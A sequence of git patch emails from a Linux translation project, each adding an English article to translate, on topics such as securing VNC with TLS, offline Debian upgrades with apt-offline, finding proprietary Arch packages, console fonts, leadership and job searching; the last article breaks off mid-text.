+[1]:https://www.cyberciti.biz/media/new/faq/2017/10/how-to-prevent-ntpd-to-listen-on-all-interfaces-on-linux-unix-box.jpg
+[2]:https://www.cyberciti.biz/faq/restarting-ntp-service-on-linux/
+[3]:https://www.cyberciti.biz/faq/freebsd-unix-find-the-process-pid-listening-on-a-certain-port-commands/
+[4]:https://twitter.com/nixcraft
+[5]:https://facebook.com/nixcraft
+[6]:https://plus.google.com/+CybercitiBiz
From a99a0f10ffdee7d0f57da467619877253975d4d4 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:36:56 +0800
Subject: [PATCH 039/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Easy=20guide=20to?=
=?UTF-8?q?=20secure=20VNC=20server=20with=20TLS=20encryption?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...o secure VNC server with TLS encryption.md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md
diff --git a/sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md b/sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md
new file mode 100644
index 0000000000..189e57535f
--- /dev/null
+++ b/sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md
@@ -0,0 +1,135 @@
+Easy guide to secure VNC server with TLS encryption
+======
+In this tutorial, we will learn to install VNC server & secure VNC server sessions with TLS encryption.
+This method has been tested on CentOS 6 & 7 but should work on other versions/OS as well (RHEL, Scientific Linux etc).
+
+**(Recommended Read:[Ultimate guide for Securing SSH sessions][1] )**
+
+### Installing VNC server
+
+Before we install VNC server on our machines, make sure we are have a working GUI. If GUI is not installed on our machine, we can install it by executing the following command,
+
+```
+yum groupinstall "GNOME Desktop"
+```
+
+Now we will tigervnc as our VNC server, to install it run,
+
+```
+# yum install tigervnc-server
+```
+
+Once VNC server has been installed, we will create a new user to access the server,
+
+```
+# useradd vncuser
+```
+
+& assign it a password for accessing VNC by using following command,
+
+```
+# vncpasswd vncuser
+```
+
+Now we have a little change in configuration on CentOS 6 & 7, we will first address the CentOS 6 configuration,
+
+#### CentOS 6
+
+Now we need to edit VNC configuration file,
+
+```
+ **# vim /etc/sysconfig/vncservers**
+```
+
+& add the following lines,
+
+```
+[ …]
+VNCSERVERS= "1:vncuser"
+VNCSERVERARGS[1]= "-geometry 1024×768″
+```
+
+Save the file & exit. Next restart the vnc service to implement the changes,
+
+```
+# service vncserver restart
+```
+
+& enable it at boot,
+
+```
+# chkconfig vncserver on
+```
+
+#### CentOS 7
+
+On CentOS 7, /etc/sysconfig/vncservers file has been changed to /lib/systemd/system/vncserver@.service. We will use this configuration file as reference, so create a copy of the file,
+
+```
+# cp /lib/systemd/system/vncserver@.service /etc/systemd/system/vncserver@:1.service
+```
+
+Next we will edit the file to include our created user,
+
+```
+# vim /etc/systemd/system/vncserver@:1.service
+```
+
+& edit the user on the following 2 lines,
+
+```
+ExecStart=/sbin/runuser -l vncuser -c "/usr/bin/vncserver %i"
+PIDFile=/home/vncuser/.vnc/%H%i.pid
+```
+
+Save file & exit. Next restart the service & enable it at boot,
+
+```
+systemctl restart[[email protected]][2]:1.service
+systemctl enable[[email protected]][2]:1.service
+```
+
+We now have our VNC server ready & can connect to it from a client machine using the IP address of VNC server. But we before we do that, we will secure our connections with TLS encryption.
+
+### Securing the VNC session
+
+To secure VNC server session, we will first configure the encryption method to secure VNC server sessions. We will be using TLS encryption but can also use SSL encryption. Execute the following command to start using TLS encrytption on VNC server,
+
+```
+# vncserver -SecurityTypes=VeNCrypt,TLSVnc
+```
+
+You will asked to enter a password to access VNC (if using any other user, than the above mentioned user)
+
+![secure vnc server][4]
+
+We can now access the server using the VNC viewer from the client machine, use the following command to start vnc viewer with secure connection,
+
+ **# vncviewer -SecurityTypes=VeNCrypt,TLSVnc 192.168.1.45:1**
+
+here, 192.168.1.45 is the IP address of the VNC server.
+
+![secure vnc server][6]
+
+Enter the password & we can than access the server remotely & that too with TLS encryption.
+
+This completes our tutorial, feel free to send your suggestions or queries using the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/secure-vnc-server-tls-encryption/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/ultimate-guide-to-securing-ssh-sessions/
+[2]:/cdn-cgi/l/email-protection
+[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=642%2C241
+[4]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/secure_vnc-1.png?resize=642%2C241
+[5]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=665%2C419
+[6]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/secure_vnc-2.png?resize=665%2C419
From 6af2cfebb7b7de1e3c6cf65626987d011c1ea9aa Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:38:57 +0800
Subject: [PATCH 040/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Fully?=
=?UTF-8?q?=20Update=20And=20Upgrade=20Offline=20Debian-based=20Systems?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Upgrade Offline Debian-based Systems.md | 125 ++++++++++++++++++
1 file changed, 125 insertions(+)
create mode 100644 sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md
diff --git a/sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md b/sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md
new file mode 100644
index 0000000000..a0fb133043
--- /dev/null
+++ b/sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md
@@ -0,0 +1,125 @@
+How To Fully Update And Upgrade Offline Debian-based Systems
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/11/Upgrade-Offline-Debian-based-Systems-2-720x340.png)
+
+A while ago we have shown you how to install softwares in any[ **offline Ubuntu**][1] system and any [**offline Arch Linux**][2] system. Today, we will see how to fully update and upgrade offline Debian-based systems. Unlike the previous methods, we do not update/upgrade a single package, but the whole system. This method can be helpful where you don't have an active Internet connection or slow Internet speed.
+
+### Fully Update And Upgrade Offline Debian-based Systems
+
+Let us say, you have a system (Windows or Linux) with high-speed Internet connection at work and a Debian or any Debian derived systems with no internet connection or very slow Internet connection(like dial-up) at home. You want to upgrade your offline home system. What would you do? Buy a high speed Internet connection? Not necessary! You still can update or upgrade your offline system with Internet. This is where **Apt-Offline** comes in help.
+
+As the name says, apt-offline is an Offline APT Package Manager for APT based systems like Debian and Debian derived distributions such as Ubuntu, Linux Mint. Using apt-offline, we can fully update/upgrade our Debian box without the need of connecting it to the Internet. It is cross-platform tool written in the Python Programming Language and has both CLI and graphical interfaces.
+
+#### Requirements
+
+ * An Internet connected system (Windows or Linux). We call it online system for the sake of easy understanding throughout this guide.
+ * An Offline system (Debian and Debian derived system). We call it offline system.
+ * USB drive or External Hard drive with sufficient space to carry all updated packages.
+
+
+
+#### Installation
+
+Apt-Offline is available in the default repositories of Debian and derivatives. If your Online system is running with Debian, Ubuntu, Linux Mint, and other DEB based systems, you can install Apt-Offline using command:
+```
+sudo apt-get install apt-offline
+```
+
+If your Online runs with any other distro than Debian, git clone Apt-Offline repository:
+```
+git clone https://github.com/rickysarraf/apt-offline.git
+```
+
+Go the directory and run it from there.
+```
+cd apt-offline/
+```
+```
+sudo ./apt-offline
+```
+
+#### Steps to do in Offline system (Non-Internet connected system)
+
+Go to your offline system and create a directory where you want to store the signature file:
+```
+mkdir ~/tmp
+```
+```
+cd ~/tmp/
+```
+
+You can use any directory of your choice. Then, run the following command to generate the signature file:
+```
+sudo apt-offline set apt-offline.sig
+```
+
+Sample output would be:
+```
+Generating database of files that are needed for an update.
+
+Generating database of file that are needed for operation upgrade
+```
+
+By default, apt-offline will generate database of files that are needed to be update and upgrade. You can use **--` update`** or `**--upgrade** options to create database for either one of these.`
+
+Copy the entire **tmp** folder in an USB drive or external drive and go to your online system (Internet-enabled system).
+
+#### Steps to do in Online system
+
+Plug in your USB drive and go to the temp directory:
+```
+cd tmp/
+```
+
+Then, run the following command:
+```
+sudo apt-offline get apt-offline.sig --threads 5 --bundle apt-offline-bundle.zip
+```
+
+Here, "-threads 5" represents the number of APT repositories. You can increase the number if you want to download packages from more repositories. And, "-bundle apt-offline-bundle.zip" option represents all packages will be bundled in a single archive file called **apt-offline-bundle.zip**. This archive file will be saved in your current working directory.
+
+The above command will download data based on the signature file generated earlier in the offline system.
+
+[![][3]][4]
+
+This will take several minutes depending upon the Internet connection speed. Please note that apt-offline is cross platform, so you can use it to download packages on any OS.
+
+Once completed, copy the **tmp** folder to USB or External drive and return back to the offline system. Make sure your USB device has enough free space to keep all downloaded files, because all packages are available in the tmp folder now.
+
+#### Steps to do in offline system
+
+Plug in the device in your offline system and go to the **tmp** directory where you have downloaded all packages earlier.
+```
+cd tmp
+```
+
+Then, run the following command to install all download packages.
+```
+sudo apt-offline install apt-offline-bundle.zip
+```
+
+This will update the APT database, so APT will find all required packages in the APT cache.
+
+**Note:** If both online and offline systems are in the same local network, you can transfer the **tmp** folder to the offline system using "scp" or any other file transfer applications. If both systems are in different places, copy the folder using USB devices.
+
+And, that's all for now folks. I hope this guide will useful for you. More good stuffs to come. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/fully-update-upgrade-offline-debian-based-systems/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/install-softwares-offline-ubuntu-16-04/
+[2]:https://www.ostechnix.com/install-packages-offline-arch-linux/
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/apt-offline.png ()
From 3fd35032706b17db4c0ff6a874577184316cf732 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:41:50 +0800
Subject: [PATCH 041/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20allowing=20?=
=?UTF-8?q?myself=20to=20be=20vulnerable=20made=20me=20a=20better=20leader?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...o be vulnerable made me a better leader.md | 64 +++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md
diff --git a/sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md b/sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md
new file mode 100644
index 0000000000..1cd6a22162
--- /dev/null
+++ b/sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md
@@ -0,0 +1,64 @@
+How allowing myself to be vulnerable made me a better leader
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/leaderscatalysts.jpg?itok=f8CwHiKm)
+
+Conventional wisdom suggests that leadership is strong, bold, decisive. In my experience, leadership does feel like that some days.
+
+Some days leadership feels more vulnerable. Doubts creep in: Am I making good decisions? Am I the right person for this job? Am I focusing on the most important things?
+
+The trick with these moments is to talk about these moments. When we keep them secret, our insecurity only grows. Being an open leader means pushing our vulnerability into the spotlight. Only then can we seek comfort from others who have experienced similar moments.
+
+To demonstrate how this works, I'll share a story.
+
+### A nagging question
+
+If you work in the tech industry, you'll note an obvious focus on creating [an organization that's inclusive][1]--a place for diversity to flourish. Long story short: I thought I was a "diversity hire," someone hired because of my gender, not my ability. Even after more than 15 years in the industry, with all of the focus on diversity in hiring, that possibility got under my skin. Along came the doubts: Was I hired because I was the best person for the job--or because I was a woman? After years of knowing I was hired because I was the best person, the fact that I was female suddenly seemed like it was more interesting to potential employers.
+
+I rationalized that it didn't matter why I was hired; I knew I was the best person for the job and would prove it. I worked hard, delivered results, made mistakes, learned, and did everything an employer would want from an employee.
+
+And yet the "diversity hire" question nagged. I couldn't shake it. I avoided the subject like the plague and realized that not talking about it was a signal that I had no choice but to deal with it. If I continued to avoid the subject, it was going to affect my work. And that's the last thing I wanted.
+
+### Speaking up
+
+Talking about diversity and inclusion can be awkward. So many factors enter into the decision to open up:
+
+ * Can we trust our co-workers with a vulnerable moment?
+ * Can a leader of a team be too vulnerable?
+ * What if I overstep? Do I damage my career?
+
+
+
+In my case, I ended up at a lunch Q&A session with an executive who's a leader in many areas of the organization--especially candid conversations. A coworker asked the "Was I a diversity hire?" question. He stopped and spent a significant amount of time talking about this question to a room full of women. I'm not going to recount the entire discussion here; I will share the most salient point: If you know you're qualified for the job and you know the interview went well, don't doubt the outcome. Anyone who questions whether you're a diversity hire has their own questions to answer. You don't have to go on their journey.
+
+Mic drop.
+
+I wish I could say that I stopped thinking about this topic. I didn't. The question lingered: What if I am the exception to the rule? What if I was the one diversity hire? I realized that I couldn't avoid the nagging question.
+
+Because I had the courage to be vulnerable--to go there with my question--I had the burden of my secret question lifted.
+
+A few weeks later I had a one-on-one with the executive. At the end of conversation, I mentioned that, as a woman, I appreciate his candid conversations about diversity and inclusion. It's easier to talk about these topics when a recognized leader is willing to have the conversation. I also returned to the "Was I a diversity hire? question. He didn't hesitate: We talked. At the end of the conversation, I realized that I was hungry to talk about these things that require bravery; I only needed a nudge and someone who cared enough to talk and listen.
+
+Because I had the courage to be vulnerable--to go there with my question--I had the burden of my secret question lifted. Feeling physically lighter, I started to have constructive conversations around the questions of implicit bias, what we can do to be inclusive, and what diversity looks like. As I've learned, every person has a different answer when I ask the diversity question. I wouldn't have gotten to have all of these amazing conversations if I'd stayed stuck with my secret.
+
+I had courage to talk, and I hope you will too.
+
+Let's talk about these things that hold us back in terms of our ability to lead so we can be more open leaders in every sense of the phrase. Has allowing yourself to be vulnerable made you a better leader?
+
+### About The Author
+
+Angela Robertson;Angela Robertson Works As A Senior Manager At Microsoft. She Works With An Amazing Team Of People Passionate About Community Contributions;Engaged In Open Organizations. Before Joining Microsoft;Angela Worked At Red Hat
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/12/how-allowing-myself-be-vulnerable-made-me-better-leader
+
+作者:[Angela Robertson][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/arobertson98
+[1]:https://opensource.com/open-organization/17/9/building-for-inclusivity
From 4b5083231da83b2628e7a184312b3ba609b6aaf0 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:43:55 +0800
Subject: [PATCH 042/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Find?=
=?UTF-8?q?=20The=20Installed=20Proprietary=20Packages=20In=20Arch=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...lled Proprietary Packages In Arch Linux.md | 120 ++++++++++++++++++
1 file changed, 120 insertions(+)
create mode 100644 sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md
diff --git a/sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md b/sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md
new file mode 100644
index 0000000000..69b523426c
--- /dev/null
+++ b/sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md
@@ -0,0 +1,120 @@
+How To Find The Installed Proprietary Packages In Arch Linux
+======
+![](https://www.ostechnix.com/wp-content/uploads/2018/01/Absolutely-Proprietary-720x340.jpg)
+Are you an avid free software supporter and currently using any Arch based distribution? I've got a small tip for you! Now, you can easily find the installed proprietary packages in Arch Linux and its variants such as Antergos, Manjaro Linux etc. You don't need to refer the license details of the installed package in its website or use any external tool to find out whether the package is free or proprietary.
+
+### Find The Installed Proprietary Packages In Arch Linux
+
+A fellow developer has developed an utility named **" Absolutely Proprietary"**, a proprietary package detector for arch-based distributions. It compares all installed packages in your Arch based system against Parabola's package [blacklist][1] and [aur-blacklist][2] and then prints your **Stallman Freedom Index** (free/total). Additionally, you can save the list to a file and share or compare it with other systems/users.
+
+Before installing it, Make sure you have installed **python** and **git**.
+
+Then, git clone the repository:
+```
+git clone https://github.com/vmavromatis/absolutely-proprietary.git
+```
+
+This command will download all contents in a directory called 'absolutely-proprietary' in your current working directory.
+
+Change to that directory:
+```
+cd absolutely-proprietary
+```
+
+And, find the installed proprietary packages using command:
+```
+python main.py
+```
+
+This command will download the blacklist.txt, aur-blacklist.txt and compare the locally installed packages with the remote packages and displays the
+
+Here is the sample output from my Arch Linux desktop:
+```
+Retrieving local packages (including AUR)...
+Downloading https://git.parabola.nu/blacklist.git/plain/blacklist.txt
+Downloading https://git.parabola.nu/blacklist.git/plain/aur-blacklist.txt
+Comparing local packages to remote...
+=============================================
+47 ABSOLUTELY PROPRIETARY PACKAGES INSTALLED
+=============================================
+
+Your GNU/Linux is infected with 47 proprietary packages out of 1370 total installed.
+Your Stallman Freedom Index is 96.57
+
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| Name | Status | Libre Alternatives | Description |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| chromium-pepper-flash | nonfree | | proprietary Google Chrome EULA, missing sources |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| faac | nonfree | | [FIXME:description] is a GPL'ed package, but has non free code that can't be distributed und|
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| libunrar | nonfree | | part of nonfree unrar, Issue442 |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| opera | nonfree | | nonfree, nondistributable, built from binary installers, etc |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| shutter | nonfree | | need registered user to download (and access website) the source code and depends perl-net-d|
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| ttf-ms-fonts | nonfree | | |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| ttf-ubuntu-font-family | nonfree | | Ubuntu font license considered non-free by DFSG and Fedora |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| unace | nonfree | | license forbids making competing ACE archivers from unace |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| unrar | nonfree | unar | |
+| | | fsf | |
+| | | unrar | |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| virtualbox | nonfree | | contains BIOS which needs a nonfree compiler to build from source (OpenWatcom compiler), doe|
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| wordnet | nonfree | | |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+
+
+Save list to file? (Y/n)
+```
+
+[![][3]][4]
+
+As you can see, I have 47 proprietary packages in my system. Like I said already, we can save it to a file and review them later. To do so, jut press 'y' when you are prompted to save the list in a file. Then press 'y' to accept the defaults or hit 'n' to save it in your preferred format and location.
+```
+Save list to file? (Y/n) y
+Save as markdown table? (Y/n) y
+Save it to (/tmp/tmpkuky_082.md): y
+The list is saved at /home/sk/absolutely-proprietary/y.md
+
+You can review it from the command line
+using the "less -S /home/sk/absolutely-proprietary/y.md"
+or, if installed, the "most /home/sk/absolutely-proprietary/y.md" commands
+```
+
+As you may noticed, I have only the **nonfree** packages. It will display two more type of packages such as semifree, uses-nonfree.
+
+ * **nonfree** : This package is blatantly nonfree software.
+ * **semifree** : This package is mostly free, but contains some nonfree software.
+ * **uses-nonfree** : This package depends on, recommends, or otherwise inappropriately integrates with other nonfree software or services.
+
+
+
+Another notable feature of this utility is it's not just displays the propriety packages, but also alternatives to such packages.
+
+Hope this helps. I will be soon here with another useful guide soon. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/find-installed-proprietary-packages-arch-linux/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://git.parabola.nu/blacklist.git/plain/blacklist.txt
+[2]:https://git.parabola.nu/blacklist.git/plain/aur-blacklist.txt
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:http://www.ostechnix.com/wp-content/uploads/2018/01/Proprietary-Packages-1-1.png ()
From f6722eafd30b4f118b5d235ef5b21c4f2aff0903 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:45:50 +0800
Subject: [PATCH 043/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Change?=
=?UTF-8?q?=20Your=20Linux=20Console=20Fonts?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... How to Change Your Linux Console Fonts.md | 88 +++++++++++++++++++
1 file changed, 88 insertions(+)
create mode 100644 sources/tech/20180104 How to Change Your Linux Console Fonts.md
diff --git a/sources/tech/20180104 How to Change Your Linux Console Fonts.md b/sources/tech/20180104 How to Change Your Linux Console Fonts.md
new file mode 100644
index 0000000000..302f8459b4
--- /dev/null
+++ b/sources/tech/20180104 How to Change Your Linux Console Fonts.md
@@ -0,0 +1,88 @@
+translating by lujun9972
+How to Change Your Linux Console Fonts
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/font-size_0.png?itok=d97vmyYa)
+
+I try to be a peaceful soul, but some things make that difficult, like tiny console fonts. Mark my words, friends, someday your eyes will be decrepit and you won't be able to read those tiny fonts you coded into everything, and then you'll be sorry, and I will laugh.
+
+Fortunately, Linux fans, you can change your console fonts. As always, the ever-changing Linux landscape makes this less than straightforward, and font management on Linux is non-existent, so we'll muddle along as best we can. In this article, I'll show what I've found to be the easiest approach.
+
+### What is the Linux Console?
+
+Let us first clarify what we're talking about. When I say Linux console, I mean TTY1-6, the virtual terminals that you access from your graphical desktop with Ctrl+Alt+F1 through F6. To get back to your graphical environment, press Alt+F7. (This is no longer universal, however, and your Linux distribution may have it mapped differently. You may have more or fewer TTYs, and your graphical session may not be at F7. For example, Fedora puts the default graphical session at F2, and an extra one at F1.) I think it is amazingly cool that we can have both X and console sessions running at the same time.
+
+The Linux console is part of the kernel, and does not run in an X session. This is the same console you use on headless servers that have no graphical environments. I call the terminals in a graphical session X terminals, and terminal emulators is my catch-all name for both console and X terminals.
+
+But that's not all. The Linux console has come a long way from the early ANSI days, and thanks to the Linux framebuffer, it has Unicode and limited graphics support. There are also a number of console multimedia applications that we will talk about in a future article.
+
+### Console Screenshots
+
+The easy way to get console screenshots is from inside a virtual machine. Then you can use your favorite graphical screen capture program from the host system. You may also make screen captures from your console with [fbcat][1] or [fbgrab][2]. `fbcat` creates a portable pixmap format (PPM) image; this is a highly portable uncompressed image format that should be readable on any operating system, and of course you can convert it to whatever format you want. `fbgrab` is a wrapper script to `fbcat` that creates a PNG file. There are multiple versions of `fbgrab` written by different people floating around. Both have limited options and make only a full-screen capture.
+
+`fbcat` needs root permissions, and must redirect to a file. Do not specify a file extension, but only the filename:
+```
+$ sudo fbcat > Pictures/myfile
+
+```
+
+After cropping in GIMP, I get Figure 1.
+
+It would be nice to have a little padding on the left margin, so if any of you excellent readers know how to do this, please tell us in the comments.
+
+`fbgrab` has a few more options that you can read about in `man fbgrab`, such as capturing a different console, and time delay. This example makes a screen grab just like `fbcat`, except you don't have to explicitly redirect:
+```
+$ sudo fbgrab Pictures/myOtherfile
+
+```
+
+### Finding Fonts
+
+As far as I know, there is no way to list your installed kernel fonts other than looking in the directories they are stored in: `/usr/share/consolefonts/` (Debian/etc.), `/lib/kbd/consolefonts/` (Fedora), `/usr/share/kbd/consolefonts` (openSUSE)...you get the idea.
+
+### Changing Fonts
+
+Readable fonts are not a new concept. Embrace the old! Readability matters. And so does configurability, which sometimes gets lost in the rush to the new-shiny.
+
+On Debian/Ubuntu/etc. systems you can run `sudo dpkg-reconfigure console-setup` to set your console font, then run the `setupcon` command in your console to activate the changes. `setupcon` is part of the `console-setup` package. If your Linux distribution doesn't include it, there might be a package for you at [openSUSE][3].
+
+You can also edit `/etc/default/console-setup` directly. This example sets the Terminus Bold font at 32 points, which is my favorite, and restricts the width to 80 columns.
+```
+ACTIVE_CONSOLES="/dev/tty[1-6]"
+CHARMAP="UTF-8"
+CODESET="guess"
+FONTFACE="TerminusBold"
+FONTSIZE="16x32"
+SCREEN_WIDTH="80"
+
+```
+
+The FONTFACE and FONTSIZE values come from the font's filename, `TerminusBold32x16.psf.gz`. Yes, you have to know to reverse the order for FONTSIZE. Computers are so much fun. Run `setupcon` to apply the new configuration. You can see the whole character set for your active font with `showconsolefont`. Refer to `man console-setup` for complete options.
+
+### Systemd
+
+Systemd is different from `console-setup`, and you don't need to install anything, except maybe some extra font packages. All you do is edit `/etc/vconsole.conf` and then reboot. On my Fedora and openSUSE systems I had to install some extra Terminus packages to get the larger sizes as the installed fonts only went up to 16 points, and I wanted 32. This is the contents of `/etc/vconsole.conf` on both systems:
+```
+KEYMAP="us"
+FONT="ter-v32b"
+
+```
+
+Come back next week to learn some more cool console hacks, and some multimedia console applications.
+
+Learn more about Linux through the free ["Introduction to Linux" ][4]course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2018/1/how-change-your-linux-console-fonts
+
+作者:[Carla Schroder][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/cschroder
+[1]:http://jwilk.net/software/fbcat
+[2]:https://github.com/jwilk/fbcat/blob/master/fbgrab
+[3]:https://software.opensuse.org/package/console-setup
+[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 5c1c301d3df3c729839fdd4e8770fc3dd1bb502b Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:51:06 +0800
Subject: [PATCH 044/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20ways=20open?=
=?UTF-8?q?=20source=20can=20strengthen=20your=20job=20search?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...n source can strengthen your job search.md | 55 +++++++++++++++++++
1 file changed, 55 insertions(+)
create mode 100644 sources/tech/20180103 5 ways open source can strengthen your job search.md
diff --git a/sources/tech/20180103 5 ways open source can strengthen your job search.md b/sources/tech/20180103 5 ways open source can strengthen your job search.md
new file mode 100644
index 0000000000..945465e78e
--- /dev/null
+++ b/sources/tech/20180103 5 ways open source can strengthen your job search.md
@@ -0,0 +1,55 @@
+5 ways open source can strengthen your job search
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/resume_career_document_general.png?itok=JEaFL2XI)
+
+Are you searching for a job in the bustling tech industry? Whether you're a seasoned member of the tech community looking for a new challenge or a recent graduate looking for your first job, contributing to open source projects can be a great way to boost your attractiveness as a candidate. Below are five ways your work on open source projects may strengthen your job hunt.
+
+### 1. Get project experience
+
+Perhaps the clearest way working on open source projects can assist in your job search is by giving you project experience. If you are a student, you may not have many concrete projects to showcase on your resume. If you are working, perhaps you can't discuss your current projects due to privacy limitations, or maybe you're not working on tasks that interest you. Either way, scouting out appealing open source projects that allow you to showcase your skills may help in your job search. These projects are great eye-catchers on resumes and can be perfect discussion topics in interviews.
+
+In addition, many open source projects are kept in public repositories, such as [GitHub][1], so accessing the source code is easy for anyone who wants to become involved. Also, it makes your publicly accessible code contributions easy for recruiters and other individuals at potential employers to find. The fact that these projects are open allows you to demonstrate your skills in a more concrete manner than simply discussing them in an interview.
+
+### 2. Learn to ask good questions
+
+Any new member of an open source project community has the opportunity to learn a lot. They must discover avenues of communication; structure and hierarchy; documentation format; and many other aspects unique to the project. To begin participating in and contributing to a project, you need to ask many questions to put yourself in a position for success. As the familiar saying goes, there are no stupid questions. Open source project communities promote inquisivity, especially when answers aren't easy to find.
+
+The unfamiliarity when beginning to work on open source projects teaches individuals to ask questions, and to ask them often. This helps participants develop great skills in identifying what questions to ask, how to ask them, and who to approach. This skill is useful in job searching, [interviewing][2], and living life in general. Problem-solving skills and reaching out for help when you need it are highly valued in the job market.
+
+### 3. Access new technologies and continuous learning
+
+Most software projects use many different technologies. It is rare for every contributor to be familiar with every piece of technology in a project. Even after working on a project for a while, individuals likely won't be familiar with all the technologies it uses.
+
+While veterans of an open source project may be unfamiliar with certain pieces of the project, newbies will be extremely unfamiliar with many or most. This creates a huge learning opportunity. A person may begin working on an open source project to improve one piece of functionality, most likely in a technical area they are familiar with. But the path from there can take a much different turn.
+
+Working on one aspect of a project might lead you down an unfamiliar road and prompt new learning. Working on an open source project may expose you to new technologies you would never use otherwise. It can also reveal new passions, or at minimum, facilitate continuous learning--which [employers find highly desirable][3].
